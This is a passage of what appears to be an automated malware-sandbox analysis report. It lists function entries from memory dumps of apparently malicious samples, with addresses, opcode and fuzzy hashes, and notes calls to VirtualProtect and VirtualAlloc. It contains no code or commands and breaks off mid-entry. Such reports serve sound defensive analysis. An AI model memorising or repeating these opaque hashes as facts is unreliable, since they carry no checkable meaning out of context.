                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d956eff10f41fd031491f0c6a27c236860fe977dc4771a18f257c6235c609c67
                                                                                                • Instruction ID: e7da3a9fcc1ee454f0499076cdb2408a74d9c0dbdc180533240abb777c6e0f94
                                                                                                • Opcode Fuzzy Hash: d956eff10f41fd031491f0c6a27c236860fe977dc4771a18f257c6235c609c67
                                                                                                • Instruction Fuzzy Hash: B5028130F1995E4FEBA8FBA884B66BC76D2FF98300F550179E40DD32E6DD28A9418741
                                                                                                Function 00007FFD9B880E43 Relevance: .2, Instructions: 174COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fd88e0d16b26e4a3bf11e3395733cb307e5b1749b331db2a2aa619f82eef2bd2
                                                                                                • Instruction ID: b7b5e89deea06494529e39f106165b098ea21b0301d97257004bb3c3a85e4847
                                                                                                • Opcode Fuzzy Hash: fd88e0d16b26e4a3bf11e3395733cb307e5b1749b331db2a2aa619f82eef2bd2
                                                                                                • Instruction Fuzzy Hash: 1F51D175A19E8D8EE758DF688869BAA7FE0FB99318F4001BED019D73D5DBB92411C300
                                                                                                Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c9$!k9$"s9$#{9
                                                                                                • API String ID: 0-1692736845
                                                                                                • Opcode ID: 2b950c710da46a23c55ae9b6e35841d207520b35e352756cce17f38ed034cf0d
                                                                                                • Instruction ID: ae86f3615b8cc6b120213aa14eee0183da3e7b1a752d54421baa94c05492ca4a
                                                                                                • Opcode Fuzzy Hash: 2b950c710da46a23c55ae9b6e35841d207520b35e352756cce17f38ed034cf0d
                                                                                                • Instruction Fuzzy Hash: 1E51E087B1943786E31E33FD79299EC5B44DF8423DB0846B3E16E8A0C76C88648792E5

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.1%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:6
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 12311 7ffd9b88b1aa 12312 7ffd9b88b1b9 VirtualProtect 12311->12312 12314 7ffd9b88b29e 12312->12314 12315 7ffd9b88c181 12316 7ffd9b88c18f VirtualAlloc 12315->12316 12318 7ffd9b88c244 12316->12318

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B880D4C Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5[_H
                                                                                                • API String ID: 0-3279724263
                                                                                                • Opcode ID: fb024683519779c5f31ede48f31d2c50c5d26dea2771af59c2b19bae4ce11bc9
                                                                                                • Instruction ID: 7fe2f776d3ccc1f5a8d19a47f42d6b3d01bb65841a960180eefa4c2ded3a75d4
                                                                                                • Opcode Fuzzy Hash: fb024683519779c5f31ede48f31d2c50c5d26dea2771af59c2b19bae4ce11bc9
                                                                                                • Instruction Fuzzy Hash: 89912275A19E8D8FE799EF6888697A97FE1FB99310F4401BED059C73E2DAB41804C700
                                                                                                Function 00007FFD9B88B1AA Relevance: 1.6, APIs: 1, Instructions: 140memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b888000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 93dad3fdb1a6eb9bbd31a771908be4c3b7cd87efec79cbb8f064238965695c8e
                                                                                                • Instruction ID: 5862c9bc8dacd59b8c5c83ee6e19f59338627397bb23dcd33de4c1f63bd78105
                                                                                                • Opcode Fuzzy Hash: 93dad3fdb1a6eb9bbd31a771908be4c3b7cd87efec79cbb8f064238965695c8e
                                                                                                • Instruction Fuzzy Hash: 6D413C3190DB8D4FDB1D9BA89C166E97FE0EF96321F0442AFD099C3193DA746406C792
                                                                                                Function 00007FFD9B88C181 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 47 7ffd9b88c181-7ffd9b88c18d 48 7ffd9b88c18f 47->48 49 7ffd9b88c191-7ffd9b88c1cd 47->49 48->49 50 7ffd9b88c1d1-7ffd9b88c242 VirtualAlloc 48->50 49->50 53 7ffd9b88c24a-7ffd9b88c272 50->53 54 7ffd9b88c244 50->54 54->53
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b888000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction ID: ecbce58f7d08cdd5efa2aa90a69ff6190ba210e97996179a55401ba501b222c5
                                                                                                • Opcode Fuzzy Hash: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction Fuzzy Hash: 0B31FB31A0CB4C8FDB1DAB6C98166F9BBF0EF56321F10426FD05AC3152DA7468168795
                                                                                                Function 00007FFD9B8A5619 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 56 7ffd9b8a5619-7ffd9b8a564a 57 7ffd9b8a564e-7ffd9b8a5653 56->57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M
                                                                                                • API String ID: 0-3664761504
                                                                                                • Opcode ID: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction ID: b34511a45e21b288402e2a9d3dada772e9a56df924e6b87daad18560c65a8ce7
                                                                                                • Opcode Fuzzy Hash: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction Fuzzy Hash: 77E0923064E7C44FCB16AB3488684547F70EF6720174A42EEC05ACF1A7EB2DC98AC701
                                                                                                Function 00007FFD9B8A9449 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 58 7ffd9b8a9449-7ffd9b8a9474 60 7ffd9b8a9478-7ffd9b8a947d 58->60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction ID: 9f8d1d6699d3b4fcc569e11a253fb955fba038205e6ccc62ef4b7d96fb9170ce
                                                                                                • Opcode Fuzzy Hash: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction Fuzzy Hash: DEE01A6194F3D44FCB5AAB7488699543FB0AF6B21078B41EEC186CF1B3E62D9849C712
                                                                                                Function 00007FFD9B8A95F9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 61 7ffd9b8a95f9-7ffd9b8a9624 63 7ffd9b8a9628-7ffd9b8a962d 61->63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction ID: ba953d79276908f8b1c5965e08471aa22acb52f2b9af41b076d4df89630ebb6b
                                                                                                • Opcode Fuzzy Hash: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction Fuzzy Hash: 49E0E57154F3D44FCB1AEBB988698453FA0AE6B21078B41EEC089CF1B3E62DD949C711
                                                                                                Function 00007FFD9B8A9631 Relevance: .3, Instructions: 316COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b468713bd7588aea15edb305b1472e14605b7c537d832ad01db9bd14e9875df5
                                                                                                • Instruction ID: 47b93642c4cf0e09572b0ec449788595b4e9aa9c2ec5de849ddd48f73e998c85
                                                                                                • Opcode Fuzzy Hash: b468713bd7588aea15edb305b1472e14605b7c537d832ad01db9bd14e9875df5
                                                                                                • Instruction Fuzzy Hash: 9AA1B330B1890D8FDB58EF68C4A8AA977E2FF98300B550679D01EC72D6DF38A842C751
                                                                                                Function 00007FFD9B881171 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03bc7a3b354f006fc76a7cfa48e593f40e897ce92b922b7269f47fa46b5d116c
                                                                                                • Instruction ID: 69fbdc4331560eb8268ae760d45dfd0a56e42813b836fefd3c61d2a406c2b95e
                                                                                                • Opcode Fuzzy Hash: 03bc7a3b354f006fc76a7cfa48e593f40e897ce92b922b7269f47fa46b5d116c
                                                                                                • Instruction Fuzzy Hash: 6031FA30A0DA4A8FDB56EB74C8649A97BF1FF5E310B0905FAC059C71A2DE385545C740
                                                                                                Function 00007FFD9B880C25 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction ID: 55a89c2853c2ec3d53b50e70509c4a93600150b4fa32b02a41995c99840a0d1a
                                                                                                • Opcode Fuzzy Hash: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction Fuzzy Hash: F3214135F1DA5D8FE722ABB898250DC7B60DF85724F0545F3C058CB1D3D9382A869751
                                                                                                Function 00007FFD9B884C51 Relevance: .1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ac4067171acecf667c29ea7aaec5c57bed888b1b169faf0d90d5f4c79a40041e
                                                                                                • Instruction ID: 5b450efa381afaf6c60209670a25b328e60e3041148e95add525b39bd3418b08
                                                                                                • Opcode Fuzzy Hash: ac4067171acecf667c29ea7aaec5c57bed888b1b169faf0d90d5f4c79a40041e
                                                                                                • Instruction Fuzzy Hash: 1F310C31E1895D8FEB64EB54C8A4BA972A1FB5C324F1501BDD42ED32E1CA396E81CB41
                                                                                                Function 00007FFD9B882B87 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction ID: dfd89235822056c8b69d429db7ad6e2f1b440916286932d9c79c208a29ba7e54
                                                                                                • Opcode Fuzzy Hash: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction Fuzzy Hash: 42110C20B1AD0E8FEBA4EF9488A57B86291EF5C301F5500B9C41ED72B2DE38AA448710
                                                                                                Function 00007FFD9B880C40 Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction ID: 26db16c5fa50d79b017cae106418b5f22e7ef867c3ad606ca9b1458e48d68e03
                                                                                                • Opcode Fuzzy Hash: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction Fuzzy Hash: 6711A535F1EA8D8FE722DFA4886109C7FB1EF56714F0645F7C054DB2A2D9386A458780
                                                                                                Function 00007FFD9B882C52 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction ID: d7254e299d0c61633fd50ebeeaaf2b73b15b763aa472bfd5dc29bfbfdbf89828
                                                                                                • Opcode Fuzzy Hash: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction Fuzzy Hash: 88011E21B1ED0D8BEB64EF9884A967823D2DF98710F1601B9D41AC72B2DD29AA418640
                                                                                                Function 00007FFD9B8944E1 Relevance: .0, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b890000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction ID: 53628ea54a5a0456ebef643ac179e7f374f28925f1c1c01116258b0154ed8f5d
                                                                                                • Opcode Fuzzy Hash: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction Fuzzy Hash: 21F0A931B0E6894BE771975884646B93B52AB99310F0E03BBC489CB1E3DD6CD6454381
                                                                                                Function 00007FFD9B880C48 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction ID: 37f4339d33d39cd644b4e054429b46a73f4236abb15be0902c5367a7f2ccc744
                                                                                                • Opcode Fuzzy Hash: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction Fuzzy Hash: 16018031E1EA8D8FE726DFA4886009C7FB1EF56714F1641F7C054DB2A2D9386A458780
                                                                                                Function 00007FFD9B894021 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b890000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f816e9fdf322565091b56c120fde06d9b49a4cc4fa58d20ab5f0daee4d58842d
                                                                                                • Instruction ID: bef2b07e75fe74a3ada801682d41d814f5ea77a6482d6349d68a978e57ce8e6e
                                                                                                • Opcode Fuzzy Hash: f816e9fdf322565091b56c120fde06d9b49a4cc4fa58d20ab5f0daee4d58842d
                                                                                                • Instruction Fuzzy Hash: E1F04F71E0551E8BFB68EB44C8686BD7BF1FF58310F040A3AC415D32A4DF786A428B80
                                                                                                Function 00007FFD9B882C9D Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 8629ccb71356551793cb72b9435150d64bf50a69d22b91340b35a22e1fcecbb4
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 9EF0F434A1AD0E8BEBA4FFC0C8A46B87361EF58311F510179C41AD72B1CE386A85C700
                                                                                                Function 00007FFD9B8946A5 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b890000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction ID: 793c16305598de0da2036bd3913b430ef0dee1226a1446d76d8f3a44a313ab82
                                                                                                • Opcode Fuzzy Hash: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction Fuzzy Hash: 8AF05430B0D91F8BFE359B98E4505B93390FF59711F164179D85AC31E7DE28EA428680
                                                                                                Function 00007FFD9B8AD3B9 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction ID: 3e0a9effb5b4379b3dea4615c122526dd3d7830f0d2d2b3d5d97d14099ed72c8
                                                                                                • Opcode Fuzzy Hash: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction Fuzzy Hash: 58F01C6155F7D41FD3229B388C254557FA0EB1710574A46EBC0C9CB5B3EA0A988B8312
                                                                                                Function 00007FFD9B881DE1 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cf0ac7e0c0f75ade8b57afa115da3b73235f2550fe306a08f9d25b6232a2584
                                                                                                • Instruction ID: 7a99098e59ef17b41aa4d92dee92fc66d2adb8f18f719d2ee45478b29fcf8eec
                                                                                                • Opcode Fuzzy Hash: 5cf0ac7e0c0f75ade8b57afa115da3b73235f2550fe306a08f9d25b6232a2584
                                                                                                • Instruction Fuzzy Hash: 7FF03A61F2AD2E4BF7B0F79484A57B82291AF1C710F1A0171D46DE22E1CE3CAE814A42
                                                                                                Function 00007FFD9B882BC6 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: 938b93f7eb412964e14054d9f2b4f6d1dd7efd82c935e5241432befb80103025
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 9DF0D020B1AD0D8BEBB0EF84C9A47B93352EF58311F1141B9C91AD72B2DD396E458650
                                                                                                Function 00007FFD9B880D02 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4b1cce890a7b8bbed82eb325ff52508912438608fa753e00a98f9c75927c150e
                                                                                                • Instruction ID: 4a3df3ffd12e38fb49a7e82e67918ad3a5546d5f45b016834e4934e6deb8be31
                                                                                                • Opcode Fuzzy Hash: 4b1cce890a7b8bbed82eb325ff52508912438608fa753e00a98f9c75927c150e
                                                                                                • Instruction Fuzzy Hash: 16F0B430B19A0ACBE758DFA4C8A46B977E1EB58711F1446BAD019C32E5DD386684CB40
                                                                                                Function 00007FFD9B8A24B0 Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e440ec6f8ea3bf72a6a830cc167af539fb6aec95a4f611f324308661fa03d057
                                                                                                • Instruction ID: bdddf4109cd4ce0621d51b450a199109d5b3efc793ff55a958a3d1694d8f7901
                                                                                                • Opcode Fuzzy Hash: e440ec6f8ea3bf72a6a830cc167af539fb6aec95a4f611f324308661fa03d057
                                                                                                • Instruction Fuzzy Hash: FFE09A2011EBC44FCB02EB388C294147FE1EB4B200B8E81FBD088CB1B3CA5988898302
                                                                                                Function 00007FFD9B8829F8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23af8b02c83673e697804d6912b726cbfc3ac525e99587d5a450d14d2ff9be44
                                                                                                • Instruction ID: b78ef2243c147c3e8238b345662f9333ec1ed41f0041ed020e7f70da1993ea68
